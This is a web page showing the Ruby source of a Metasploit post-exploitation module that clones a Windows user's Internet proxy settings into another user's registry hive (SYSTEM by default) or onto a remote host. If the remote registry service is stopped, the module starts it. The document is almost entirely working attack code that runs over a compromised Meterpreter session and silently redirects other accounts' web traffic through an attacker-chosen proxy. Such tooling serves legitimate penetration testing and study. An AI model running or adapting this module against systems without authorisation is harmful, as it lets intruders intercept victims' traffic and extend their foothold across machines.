CoCalc provides the best real-time collaborative environment for Jupyter Notebooks, LaTeX documents, and SageMath, scalable from individual users to large groups and classes!
CoCalc provides the best real-time collaborative environment for Jupyter Notebooks, LaTeX documents, and SageMath, scalable from individual users to large groups and classes!
Path: blob/master/modules/post/windows/manage/clone_proxy_settings.rb
Views: 1904
##1# This module requires Metasploit: https://metasploit.com/download2# Current source: https://github.com/rapid7/metasploit-framework3##45class MetasploitModule < Msf::Post6include Msf::Auxiliary::Report78def initialize9super(10'Name' => 'Windows Manage Proxy Setting Cloner',11'Description' => %q{12This module copies the proxy settings from the current user to the13targeted user SID, supports remote hosts as well if remote registry14is allowed.15},16'Author' => [ 'mubix' ],17'License' => MSF_LICENSE,18'Platform' => [ 'win' ],19'SessionTypes' => [ 'meterpreter' ],20'Compat' => {21'Meterpreter' => {22'Commands' => %w[23stdapi_registry_create_key24stdapi_registry_open_key25stdapi_registry_open_remote_key26]27}28}29)3031register_options(32[33OptAddress.new('RHOST', [ false, 'Remote host to clone settings to, defaults to local' ]),34OptString.new('SID', [ false, 'SID of user to clone settings to, defaults to SYSTEM', 'S-1-5-18' ])35]36)37end3839def parse_settings(data)40print_status "\tProxy Counter = #{data[4, 1].unpack('C*')[0]}"41case data[8, 1].unpack('C*')[0]42when 143print_status "\tSetting: No proxy settings"44when 345print_status "\tSetting: Proxy server"46when 547print_status "\tSetting: Set proxy via AutoConfigure script"48when 749print_status "\tSetting: Proxy server and AutoConfigure script"50when 951print_status "\tSetting: WPAD"52when 1153print_status "\tSetting: WPAD and Proxy server"54when 1355print_status "\tSetting: WPAD and AutoConfigure script"56when 1557print_status "\tSetting: WPAD, Proxy server and AutoConfigure script"58else59print_status "\tSetting: Unknown proxy setting found"60end6162cursor = 1263proxyserver = data[cursor + 4, data[cursor, 1].unpack('C*')[0]]64print_status "\tProxy Server: #{proxyserver}" if proxyserver != ''6566cursor = cursor + 4 + data[cursor].unpack('C*')[0]67additionalinfo = data[cursor + 4, data[cursor, 1].unpack('C*')[0]]68print_status "\tAdditional Info: #{additionalinfo}" if additionalinfo != ''6970cursor = cursor + 4 + data[cursor].unpack('C*')[0]71autoconfigurl = data[cursor + 4, data[cursor, 1].unpack('C*')[0]]72print_status "\tAutoConfigURL: #{autoconfigurl}" if autoconfigurl != ''73end7475def target_settings(dst_root_key, dst_base_key)76if datastore['RHOST']77begin78dst_key = session.sys.registry.open_remote_key(datastore['RHOST'], dst_root_key)79rescue ::Rex::Post::Meterpreter::RequestError80print_error("Unable to contact remote registry service on #{datastore['RHOST']}")81print_status('Attempting to start service remotely...')82begin83service_start('RemoteRegistry', datastore['RHOST'])84rescue StandardError85print_error('Unable to read registry or start the service, exiting...')86return87end88startedreg = true89dst_key = session.sys.registry.open_remote_key(datastore['RHOST'], dst_root_key)90end91dst_open_key = dst_key.open_key(dst_base_key)92else93dst_open_key = session.sys.registry.open_key(dst_root_key, dst_base_key)94end9596dst_values = dst_open_key.query_value('DefaultConnectionSettings')9798# If we started the service we need to stop it.99service_stop('RemoteRegistry', datastore['RHOST']) if startedreg100101dst_data = dst_values.data102103print_status('Current proxy settings for target:')104parse_settings(dst_data)105end106107def run108if (datastore['SID'] == '') && !datastore['RHOST']109print_error('No reason to copy the settings on top of themselves, please set a SID or/and RHOST')110return111end112113# Pull current user's settings114src_root_key, src_base_key = session.sys.registry.splitkey('HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\Connections')115src_open_key = session.sys.registry.open_key(src_root_key, src_base_key)116src_values = src_open_key.query_value('DefaultConnectionSettings')117src_data = src_values.data118print_status('Proxy settings being copied:')119parse_settings(src_data)120121# Print current settings of target122print_status('Attempting to read target\'s settings...')123if datastore['SID']124dst_root_key, dst_base_key = session.sys.registry.splitkey("HKU\\#{datastore['SID']}\\Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\Connections")125else126dst_root_key, dst_base_key = session.sys.registry.splitkey('HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\Connections')127end128129target_settings(dst_root_key, dst_base_key)130131print_status('Cloning... bahh..')132133if datastore['RHOST']134begin135dst_key = session.sys.registry.open_remote_key(datastore['RHOST'], dst_root_key)136rescue ::Rex::Post::Meterpreter::RequestError137print_error("Unable to contact remote registry service on #{datastore['RHOST']}")138print_status('Attempting to start service remotely...')139begin140service_start('RemoteRegistry', datastore['RHOST'])141rescue StandardError142print_error('Unable to read registry or start the service, exiting...')143return144end145startedreg2 = true146dst_key = session.sys.registry.open_remote_key(datastore['RHOST'], dst_root_key)147end148dst_open_key = dst_key.create_key(dst_base_key, KEY_WRITE + 0x0000)149else150dst_open_key = session.sys.registry.create_key(dst_root_key, dst_base_key, KEY_WRITE + 0x0000)151end152153# If we started the service we need to stop it.154service_stop('RemoteRegistry', datastore['RHOST']) if startedreg2155156dst_open_key.set_value('DefaultConnectionSettings', REG_BINARY, src_data)157158print_status('New settings:')159target_settings(dst_root_key, dst_base_key)160end161end162163164